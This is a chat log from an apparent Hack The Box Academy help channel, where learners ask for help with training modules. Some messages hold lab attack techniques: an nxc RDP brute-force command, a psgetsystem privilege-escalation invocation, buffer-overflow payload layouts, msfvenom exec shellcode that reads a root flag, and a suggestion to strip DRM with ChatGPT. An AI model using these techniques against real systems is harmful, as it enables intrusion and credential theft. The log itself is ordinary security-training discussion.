that basic recommended module to use socks4, try changing the version on /etc/proxychains.conf
Reread the module, and it will explain.
@cloud urchin I advised the boy to use socks4 instead of version 5, because the module always shows version 4 in use, also I'm doing the module, and using version 4 I'm not having problems for now
but that's still a socks proxy
it was a suggestion, you could try
No, it has nothing to do with it.
Ping
Any one here from htb support team
Need to speak to a person? Learn how to reach our support via HTB Labs.
@grim plaza the link above will help you contact support
Hey everyone whats up? I am using netexec for a question on password spraying for this question. --On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive). I have already created a file with the appropriate usernames. The problem i see on the command line after netexec finishes that many passwords are not even tried. I have done this question before like a year back or so so I know the answer but the tool just doesnt find it. I am using the fasttrack wordlist.
facing problem in this step
what problem
What's the command output?
And what does the module say before you run the command?
Can you link to the module please
So the instructions before it just say how to update the system
tools.list is just a list of tools you can install them manually
look at the next step
try looking for the file on the system
locate tools.list might tell you where it is
The file doesnt exist by default gotta make it
bro. SNIP means it's omitted. Read the command and type the packages manually
I don't recommend copying and pasting commands
actually i am totally new
no problem.
Another reason why you should not copy and paste
Blackfire.io ❤️🔥
ok
or make a tools.list of the tools you want to install and follow the next step
ok
Are you new to linux?
yes
If so you might benefit from the linux fundamentals module
Parrot should have a package group for their security tools, instead of reading from a file you just grab a bunch of ones that would be in it
Right ways to learn hacking ?
I would look at the parrot repository for package groups
actually i am following the path so linux fundamentals comes after the setting up module
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
for @rustic sage
I just told you in #cpts
Learn assembly and C first 
In text @real delta
In all seriousness just follow the beginner's bible
In what text?
Just read the blog from the getting started bruh
Parrot comes with all the tools you need preinstalled if you chose the security edition I think
yes i checked,and saw some are available
You can skip most things in the setting up module if you're using parrotOS
wireshark is already installed and some other tools which are mentioned also installed
thanks for the help
ok sure
I am currently taking the OS fundamentals course and I'm at the linux part. I always have issues when I try to SSH into the target machine. Can someone tell me the procedures in case I am doing anything wrongly.
What issue are you having?
The password for the machine is being requested, I input it and get a message that I am denied
Am I putting in the wrong password or what ?
Give me a minute to do that.
How do I connect to the vpn ?
good question 🙂
Yes I’m using the pwnbox
Then you should be fine on the VPN part
ok so next question:
what does your command look like that you're trying to connect to the target?
Can I ask 1 simple question ❓
you just did, that's all your questions used up; please insert 1 fakecoin into your account to ask more
Simple question is what is hacking (no cheating ) ?
That cheating
?
U should tell by own
dude
you asked a googleable question
since we have a lot of people that are ESL (English Second Language) your question came off in a way that made the assumption you were asking what hacking was, but not cheating as in game cheating
I have ETL
and i have brain damage 
we know 
you weren't supposed to agree 
I am new here
which is why we pointed you to #welcome
and as a side note #rules <-
I read it
then you'd know what the server is about and how to verify and link your HTB account :)
#general is for various types of conversations, #modules is for conversation/help with the various learning modules found at https://academy.hackthebox.com
I have not HTB account now but I will made it soon
PowerShell 7.5.0
Welcome to Parrot OS
Welcome to Pwnbox, Powered by Parrot OS
PS [10.10.14.192] /home/htb-ac-1793917 > ssh 10.129.116.172 [@htb-student]
The authenticity of host '10.129.116.172 (10.129.116.172)' can't be established.
ED25519 key fingerprint is SHA256:PHsjpBEAl6hSCzjVohppUybupbLXdBZy8FqtwlMpmjU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.116.172' (ED25519) to the list of known hosts.
htb-ac-1793917@10.129.116.172's password:
Permission denied, please try again.
htb-ac-1793917@10.129.116.172's password:
Permission denied, please try again.
htb-ac-1793917@10.129.116.172's password:
you should be doing this: ssh htb-student@10.129.116.172
right now the user you're trying to connect with is your htb pwnbox username
We just explained you buddy
Read and follow #welcome
Follow #welcome
Yup
But nothing happen
Okay
You need to verify in #bot-commands and read #rules
What that was step ?
there's a list of instructions at the bottom of the #welcome page; the "done reading" thing is discord, not HTB telling you to go here
since this would be technically the most active channel you can access
3 steps, can't miss
It worked, thank you for the assistance !
you're welcome 👏 enjoy!
the syntax is also given by the module itself
i believe just at the bottom of the reading portion
I made my HTB account now what to do
Where is account identifier
Step one tells you
How to check and copy it
There's a direct link
are you on your phone?
Yes
The link in the #welcome section points you right to the page where the identifier is
you just have to copy/paste it in the command /identify token-here
Try landscape mode or request desktop version 🙂 some phones can't parse the screen properly
Are u bot
no
I have some trouble finding the correct size. The format also raises questions for me.
Module: Stack-Based Buffer Overflows on Linux x86
Chapter: Determine the Length for Shellcode
Question: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)
Does the Format: 00 Bytes mean dec or hex, 00-99 or 00-FF?
Is 00 00 00 00 also possible?
The next part is what is the Size now:
Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
NOPs = "\x90" * 100
Shellcode = "\x44" * 150
EIP = "\x66" * 4
the current shellcode is 68
but what is the largest possible?
1036?
936?
250?
hex
00 is hex
x00 is null bytes
hex thanks
with the x or without
ff or FF make also a difference
I need help. Please, how do I get multiple URLs from keywords?
For what academy module is this for?
It’s for a personal educational project.
then it's not for this channel, read and follow #welcome to gain access to more of the server
is it just me or is it nearly impossible to have findings with a "Low" (say, below 4.0) CVSS 3.1 score?
Take the "Directory listing enabled" finding example in the Documentation & Reporting module. This is a case where no sensitive data was found in said directories.
They got it to score 4.3 (and made it a "Low" too but technically 4.3 is "Medium") I guess by marking it as Adjacent attack vector, but if I can reach the relevant site from the Internet I think it should be Network, plus a Low confidentiality impact, making it a 5.3. The best I can do is change the Environmental factor for Confidentiality Requirement to also be Low, bringing it down to 4.6... still medium, and still sounding excessive, taking attention away from more important issues.
Hi folks, any academy modules can help me prepare OSEP? Please share some thoughts
Look at the OSEP syllabus and do the modules that look similar to it
Kerberos attacks for example
hi folks, I'm doing the Linux Fundamentals module.
I got stuck on these 2 questions under the filter content section
- How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
- Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer
Is anybody online
- Think about the question and what that could mean i.e. what does localhost look like in ip format. If you don't know what tool, something about
networkstatistics
For number 2. You can search the channel using ctrl+f or the magnifying glass icon
Nobody's online, this is all a figment of your imagination
You can DM me but might take a few hours until I can get back to you
hello guys, i have a doubt about subscriptions.
i currently have the annual silver plan ($500) every year
i plan to buy a module that costs 1000 cubes
my idea was to do the monthly subscription of $78, so as to receive 1000 cubes and buy the osint module. or do the monthly subscription of 38 and maybe buy some remaining cubes (i already have 200).
but i have some questions.
can i do a monthly subscription while i have an annual subscription?
if i could, when i pay the $78, will i receive the 1000 cubes immediately or will i have to wait 1 month?
instead in that case i could not pay the monthly subscription. can i cancel the annual subscription so i can then do the monthly one?, i still have about 6 months to enjoy the benefits of the annual one, so i don't want to lose the benefits if i cancel the subscription. so my question is, if i cancel the 1 year silver subscription, do i lose access to the modules up to tier || ? and can i then do the monthly one?
best to reach out to support to find the answer
Need some help? Learn how to reach the support team on Academy.
one more thing, how can you access the general chat? Isn't it enough to have the $500 subscription?
ok
I'm fairly certain that you can't stack subscriptions.
i still hanging and dont found it i dont want brute force
Hi man, can i DM you ?
hello, i got a notification that you mentioned me
go ahead
Can anyone help with a beacon not calling back with Sliver? I can run the beacon direct as an .exe but can't execute it as shellcode for some reason
100 NOPs + 150 SHELLCODE = 250
The question is straight forward.
You just add NOPS and Shellcode together
but FA fa xfa xFA /xfa /xFA are all wrong and also 250
250 bytes you have to add that
How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)
Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
NOPs = "\x90" * 100
Shellcode = "\x44" * 150
EIP = "\x66" * 4
NOPS is 100 bytes and shellcode is 150 so thats 250 Bytes
i think the "Bytes" was more about 00
0x90 in hexadecimal represents the number 144 in decimal.
Additionally, in the context of assembly language (x86 architecture), 0x90 is the NOP (No Operation) instruction, often used in exploits and shellcode.
NOPs = "\x90" * 100 will print x90 hex 100 times
clearly. 250 was the first i tried but i thought the format: 00 Bytes means two hex digits. after that i tried a lot of others. now i know it was "250 Bytes"
no no. it meant in bytes not in hex format
now i know just a misunderstanding
happy hacking...
good morning. I have a question, I'm in the module "Pivoting, Tunneling, and Port Forwarding" in Skills Assessment: I'm trying to connect RDP using proxychains to 172.16.5.35 but I get error failed to connect to 172.16.5.35
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 172.16.5.35:3389 <--socket error or timeout!
Shutdown the VPN and use PWN box
Ok I will try!
are they working fixing the VPN
Because I don't see any announcements about it!
i am doing the module also, just for fun
is working in pwn box?
well i switched to vpn i used pwnbox
did you do the 1st question ?
yes, I'm doing right now this one : Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.
I was trying to connect via RDP to 172.16.5.35 but I get a connection error with proxychains xfreerdp. The thing is, I didn't finish this part last night; I found all the ports open. Now I came back this morning trying to finish and I found all ports closed: 22/tcp closed ssh
135/tcp closed msrpc
445/tcp closed microsoft-ds
3389/tcp closed ms-wbt-server
5985/tcp closed wsman
refresh my memory, how did you connect to 172 network i got creds found from the /home directory
from you virtual machine or pwnbox?
What proxy have you setup?
5
Chisel? SSH ?
ssh
virtual machine
Looks like your proxychains isn't set correct
Try run Crackmap/Netexec with SMB over proxychains to check
ok will restart the VM better am start all over again !
yes I will
What SSH command are you running to port forward?
sudo ssh -i id_rsa webamin@ip:~/
You are missing the port forwarding
@calm abyss how do you suggest bypassing the DRM in the Game Moding Skill assessment? i tried to hook the checkStart() function and modify the num value
check the module does it add like SSH -R 3389:IP:3389?
or they run chisel or something?
forget that, use chat GPT to rewrite the complete code. Filter out the DRM garbage and give you the normal code
you have a Private message...
Anyone any idea on this? 😦
when i use echo ${LANG} it shows en_US.UTF-8
How come i cannot see the "-" anymore when i use this command:
echo ${LANG:9:1}
i only see a blank space.. it worked yesterday..
i can see all the other characters, but not -
is there a command to make it appear again?
i go offline
I'm doing the attacking web apps with ffuf module on Kali with vpn but I'm getting like 70req/s which is taking forever with the small word list the module says to use, is there a way to make ffuf faster, I have it set to -t 100
Module mentions how it can get thousands a second
Hey guys, I’m new here trying to start hack the box challenges and I’m trying to pwn the machine titanic but finding it difficult, any help or guidance plsss
its been 3 days i give up on these
keep encountering this problem where LaZagne aint working for some reason
please dm me if you can help
Hello guys, i was reading through some modules for the SOC analyst job path(i am a newbie) and in the "Security Monitoring & SIEM Fundamentals" module on the skill assessment section i was unsure about the answer in one of the question. Is there somewhere like a forum that can help me understand why one of the answers i gave was not the correct one? what should i be on the lookout for in these kinds of situations? Thanks in advance
Which question was it?
it was this one. you see the correct answer here, but there was one admin user with much more failed log in attempts, my question was should i be looking at something different for this question since everything seemed good.
Hmmm I need to see the dashboard again for this one. The skill assessment really just wants you to focus on the one visualization it mentions in the question. I assume it was just a handful of unsuccessful logins and is meant to teach you that not every failed login is worth escalating
Windows Privilege Escalation - SeDebugPrivilege
Trying to do the task but I'm getting this error after imported and running the command in this poc: https://github.com/decoder-it/psgetsystem/tree/master
> . .\psgetsys.ps1
> ImpersonateFromParentPid -ppid 612 -command "cmd.exe"
Exception calling "CreateProcessFromParent" with "3" argument(s): "Not all privileges or groups referenced are assigned to
the caller"
At C:\Users\jordan\psgetsys.ps1:175 char:1
+ [MyProcess]::CreateProcessFromParent($ppid,$command,"$command $cmdarg ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : Win32Exception
Can someone give me a nudge with reverse engineering? I am in the stack based buffer overflows for x86 section
how can you Paste Screenshot here?
screen snip
uhh thanks
np
you mean sniptool?
Yo! Quick question. For Metasploit do I set LHOST to VPN IP or use my own?
Can anyone tell me the ip for the web server on the internal network using pwnbox. This is related to pivoting module and rpivot section
Because I used firefox with proxychains for 172.16.5.135, it's getting timeout error
As a shortcut I use
set lhost tun0
Oh that's a nice tip! thanks!
Is that the 64 bit?
I don't think running the program will give you the solution. To execute a 16-bit program, you'll need an emulator. Maybe someone who has done the lab can guide you, or you can look up how to emulate 16-bit programs. Alternatively, using a 32-bit machine should allow you to run them natively.
ive been searching for days man if you can just give me the answers
why tho
Hello all ! I started htb academy today. I am actually doing network foundations.
But for the question 2 of the skills assessment :
What is the name of the program listening on localhost:5901 of the Pwnbox
I have no idea where to look at... I work with the vpn, tried nmap but the answer it gave me doesn't work... Thanks for your help !! 🙂
it would be doing you a disservice.
Hey I’m trying to complete the network foundation module but when I do the calculation for the port and try to connect to net cat it tells me connection refused
Maybe this help you? I'm not sure if it is the correct answer but you can try to use netstat for example and grep port and see what is on in the machine.
Guide for netstat:
are you doing this on windows?
Yeah to me?
Yes
Hit the windows symbol key, then type snipping and use that for screenshots
you can just hit the copy button and paste it directly in here
What module is?
You can also WIN + SHIFT + S to take a screenshot, it auto copies it and you can paste it here
^ but snipping allows you to just grab a piece of it - like this
So does WIN SHIFT S
O.o
Oh and I don’t have discord on windows I’m using it on my phone
holy shlit
i thought it was like prt scr xD
thats useful lol
can anyone help with stack overflows?
@waxen mesa By leaking the IP do you mean your IP? If you're doing it via pwnbox it usually shows internal IP, which you can freely do i guess
..or rather, answer a question about the assessment?
I’m on pwnbox
I just wanna know tho is this netcat method the only way to get the answer because what if it’s not a mistake that I get refused connection on my end
I don’t know if you guys did this module before
There’s has to be another way to bypass the request filtering
Without using netcat
Because I can’t get the calculation right which I tried multiple times
To be fair, i didn't do the modules, but I've done some other ones on the site. And usually when you're stuck like this, most of the time it's something simple (but not obvious). It might be good to re-read the whole section for that question again, and see if you've missed something, a crucial step or something like that
Hi Guys, can anyone give me some hints on this windows priv esc skill assessment question "Find the password for the ldapadmin account somewhere on the system*
This is nuts 🥜 lmao 😂
And there’s not even any write up for a walkthrough I could find for this
Uhh.. what command are you running? Looks like it's trying to do a DNS lookup
If you're connecting to an IP, it should not be doing that
Net cat brother
I’m wondering if it’s a hack the box issue or is it really just me
Yeah I’m using an ip
Right, but the rest of the command
Knowing it's netcat doesn't help much
There must be a character in the target that's causing it to be treated as a hostname, not an IP
Oh, it's the inverse lookup
Nevermind then. The FTP module can sometimes require a reset to get it working, not sure why personally.
Oh wow 🤯
Hi @fathom pendant ,can you please give me some hints on this question
That’s the thing with this IT stuff sometimes you think it’s you whole time it’s it lmao 😂
I would have sat here for minutes trying to figure out why this not working thanks for your input now I know I can just move on
Was the ftp command used in the module and exercises you went through?
Can't really say much more on it, as it's a tier 2 module
Good luck 🙂
Tbh just ping,nc,nmap and other but no ftp from the looks of it
When you say it’s a tier 2 module, what do you mean, it’s hard or easier?
Check through the section content - the solution is not always directly demonstrated, and you may need to go through some research of the tooling and methods mentioned.
When I say it's tier 2, I mean that spoilers for modules over tier 0 are not allowed
Ok
so I can't say any more really 🙂 (check the channel topic, and the terms of service)
Is stack based overflows for x86 linux tier 0?
It will say which tier it is on the module overview
O.o
Yes tier 0
Can I ask a question here without spoiling then with more information?
If it's tier 0 you can ask and state as much as you want. If it's not, then you must not post specifics regarding the module or exercises.
Asking for help without providing specifics sounds pointless, but some do offer to reach out in DM to hear you out. Just don't trust anyone that sends you a DM saying you should join another Discord for support. Those people are worms, scammers and hardly human.
Tier 0 = Fundamental
is it possible that only smbclient is working on a skill assessment? smbmap, rpcclient, these tools are not working with null session, only smbclient is working
I am working on the assessment and have written over the $eip successfully with a pattern of 4 bytes at the end of my payload. I have tried to use msfvenom's read_file, and exec cat /root/flag.txt but these just make the msg.txt file into a VISX image? Do I need to use a reverse shell, or rather is that the intended route?
Tbh, I feel like these all might be able to work, but for some reason I am not getting a Segmentation fault when I use a shellcode payload. Is this due to me misaligning the payload when adding the shellcode, or is that expected when you redirect the instruction pointer onto the nop sled?
netstat gives me nothing on 5901 and when i try "vnc" as answer, it doesn't work... I have the feeling of having the good answer but not as they want it... It is so damn frustrating
If anyone knows how to give me a nudge please @ me! Ty
I've almost earned enough cubes from the student subscription to get a tier 3 module. Any recommendations? I'm leaning towards "Supply Attacks".
i am stuck on skill assessment hard of the module = attacking common services.
i can rdp into target and need to find the accounts which i can impersonate
then i need to impersonate as administrator and there is a flag on admin desktop dir
the section starting with shell code nc -v <target ip> 80 (pretty much at the end of chapter 3) guides you through
So where to find or who can you ask if any doubt?
Oh crap, totally got confused between you UBNA and AJU
Thought it was you asking about that windows module, my bad
You can scroll up and see how others have asked questions without spoiling the module if it's above Tier 0
My apologies 👍 Thanks!
depends what you want out of it ig
kinda a tough question without more details
I'm most interested in supply chain attacks right now. But, I've seen some modules that really weren't worth it and that you could research on your own better. I'm basically just wanting to make sure it's not a waste.
??
Curious if there's any modules on the Academy dealing with AWS security, and particularly all the instance metadata endpoints to look for. A real-world startup I'm involved in uses AWS for their infrastructure, and it was only after watching a NahamSec video that I was able to figure out what kind of a threat the 169.254.169.254 IP address can pose, so I'm curious if there's anything in the Academy either now or planned for the near future to teach that in more detail.
me too
me too man
Me too
Aren’t we all
I tried to ask for help in #binex-rev and they just sent me here xD
I'll try over there again
@fathom pendant if you are free can you help me on this one
.
No
I don't appreciate being pinged directly about something
Dm me. I'll try to help
Anyone able to help with stack overflow? I am pretty sure that I am very close to the answer, but I am having some issues with alignment, or perhaps my shellcode, or both, or neither...
I'll just describe it. I have my overflow payload writing over the eip successfully. So far it looks like this: "\x55" + "nopsled" + "shellcode" + "address somewhere in the nopsled" and the alignment is done programmatically via subtraction and multiplication like the module teaches: (2064 - 150 - 425 - 4) + 150 + 425 + 4. When I run this without the shellcode and eip redirection I can see it segfault and write what I picked to mark the stack for reference, but when I try the payload it exits successfully and doesn't exploit in any of the ways that I have tried successfully (though they do exit from gdb without error). I tried using msfvenom with exec to cat the flag, read_file to read it into the msg.txt that suid is controlling, and with a reverse shell (idk if this is intended, but if so I'll keep trying with only this one)
Did they tell you where the flag was for it? Could you try to read something that's static(like /etc/passwd)?
It said it was in /root/flag.txt
I tried to use the msfvenom's exec shellcode with CMD='cat /root/flag.txt > /home/user/flag.txt'
with the proper names and whatnot ofc
I have tried some things that caused the msg.txt file to get filled with some junk that gives it a signature of VISX img file?
Not sure about that, but it makes me think that revshell is the intended route
Maybe try "cat ~/root/flag.txt" just to make sure it's not that.. then try "CMD='sleep 5'" if that doesn't work.
Sleep 5 would at least help you narrow it down
Yeah the sleep will be a telltale for sure, bc Idk what is really happening with my payload with it exiting successfully. The program moves to a completely different location in memory than where I injected my payload so I can't even examine what went wrong.
CMD='/bin/cat /root/flag.txt | tee /home/user/flag.txt' might work too
code run in gdb runs in a different context
Ah my bad. Yes. Use -a
The binary is on an ssh instance, will grabbing a local copy still work with the suid business and all that I am supposed to be exploiting?
Maybe a dumb question, just not sure if the environment will get mangled bc of the difference in hosts ??
suid bits don't transfer between hosts
yeah, different kernel, different behavior
it really just depends on what your exploit depends on
The module teaches you how to hunt the credentials in this context, did you try doing anything shown?
hey y'all working through Password Attacks/Network Services. I'm working on my last question which is to brute force the rdp login and submit flag. I've been running hydra for quite some time now with their given wordlists.
My question is to know if it's worth it to run ncrack in parallel to speed up the brute force process or will that create issues?
yessir
Hmmm
Running parallel scans will only slow your own system and network down
I am checking for bad characters again
If I missed one it could throw everything off without throwing an error right?
Take a look at the username list they provided in the Resources. There are over 100 names, but only about 10 or so look like actual names of users. Try moving those to the top of the list. It might go faster that way.
a better solution is using one of the other remote access protocols (i believe you get a WinRM user) just generate a list of usernames from C:/Users/ instead
i did the same for /home/ on the linux machines
Great idea!
as i found out that most of the instances are shared i.e. all linux instances match the linux questions; all the windows matches windows (except for the ones regarding some AD stuff from domain joined linux)
the module also hints at this with some of the sections referring to previous sections for required passwords
so keeping credentials you find can also be helpful
yes
Did you try RDP-ing to the Windows machine, then clicking on all the links on the Desktop?
@astral egret be careful with your words next time; :)
sure man
Hello, I wanted to ask about the Linux configuration module. Do I have to install repository by repository?
ofc i did
the linux configurations are a rough reference not a full guide
you don't have to do it all; you can even do very little of it and be fine
Is there a complete guide on this?
there's no guide that encompasses all of everything; you don't have to do any of what's referenced
I was doing everything XD
if you want to do all the things; then yes you'll need to go repo by repo or check if they're in the apt repos
I used ML's tip and generated a shorter username list by checking C:\Users however I still didn't get a hit. Perhaps I'm using the wrong syntax, however this syntax worked on the other network services. Does anyone see any slight misconfigs in my syntax?
not seeing anything wrong do you get hits for the other users (with the error that the user may not be configured to use rdp?)
5 threads is low but that's neither here nor there
try resetting the lab and trying again
Wsp
yeah correct for each user it said may be a valid account but not setup for rdp. I agree sometimes resetting target helps, thanks
Or try another tool: nxc rdp 10.129.196.181 -u usernamesshort.txt -p password.txt --continue-on-success > rdp.txt
sometimes I get messed up and think 'timing template' like nmap where the max is five LOL thanks
I want to share a snip of this block of bytes... the bad chars seem too abundant...
It looks like after 08, there are 4 bad bytes in a row?
is that correct?
what you can do: copy that output and throw it into magicchef to decode to see what it may look like to see if anything breaks note that magicchef will translate 0x00 to NUL
O.o
it's just hex decoding, basically
I'll look that up, but is that correct to assume for the time being? if it was changed in value, the original byte must be a bad char no?
it looks like, for some reason; instead of going 0x09; 0x0a 0x0b 0x0c 0x... since it's counting up it goes from 0x08 to 0x78 0x30 0x39
If you clicked on all the Desktop links and didn't find what you're looking for, maybe try again, starting at the end. It's not always obvious where to look, and sometimes things that look like they might be promising (like the creds folder containing a passwords file), are not going to help you. So just look into everything -- sometimes just opening a Desktop shortcut can be more fruitful than a fancy scanning tool.
not necessarily
thanks man but i finished it
had to look inside scripts
the first one was obvi i was just stupid
the second one pointed to a script inside another script that had creds
Quick question about the Wi-Fi Penetration Testing Basics Module. I'm trying to RDP into it, but xfreerdp isn't working.
I went to ping to see if I was getting a response from the server and each ping said Destination host unreachable, and "10 packets transmitted, 0 received, +8 errors, 100% packet loss, time 9110ms
pipe 4"
I'm able to connect to other modules and labs perfectly fine, and I'm using the correct VPN file to connect up to HTB.
reach out to support
Need some help? Learn how to reach the support team on Academy.
Thank you
One guy told me learn to walk so I can run later , like we have a lot of wise folks in the industry
yep; while automated tools are nice and all, sometimes they can miss the obvious. It's why i'm somewhat against n00bies using stuff like winpeas/linpeas since they throw a bunch of junk at you and to a n00b it's overwhelming
the tools in and of themselves aren't bad
@fathom pendant I hope its ok to piggyback with a question (as I'm very much a noob myself still): What would you recommend instead? Doing it manually?
but it's like telling someone new to the office to go to a place that everyone else in the office calls "xyz" while its actual name is "zyx" i.e. "Go to the dungeon" --> "Go to the IT office"
correct
manual enumeration should always be your first go to; then automated if there's nothing that's popping out at you
How does one know when they are "ready" for more automated tools like winpeas/linpeas/SQLMap/Metasploit etc
(I tend to stay away from the latter 2 atm)
Also fair enough.
SQLMap is fine once you understand the basics of SQL
Metasploit i mostly only use if i can't be bothered to refactor a code from python 2.x to 3.11+
searchsploit is a powerful tool as it allows you to copy the exploit code for editing or further reading (in some cases it's a text file that contains the basic instructions to exploit something)
It's a good first step. If I'm looking for something in an SMB file share, for example, I'll use smbclient to tar the whole share, transfer it to my computer, open it up in VSCode, then go poking through all the folders manually, opening up files to see what I find.
I reset the target and still can't brute force the rdp login. should I try on pwnbox? I would think yes however it's weird I could brute force other services with hydra on my machine just not rdp
i.e. run curl http://exploited.server -H "Some paramater: Some Value"...
try with nxc
sometimes hydra is just silly
@neon wadi @fathom pendant I appreciate both of y'alls feedback and help! Have a blessed day 🙂
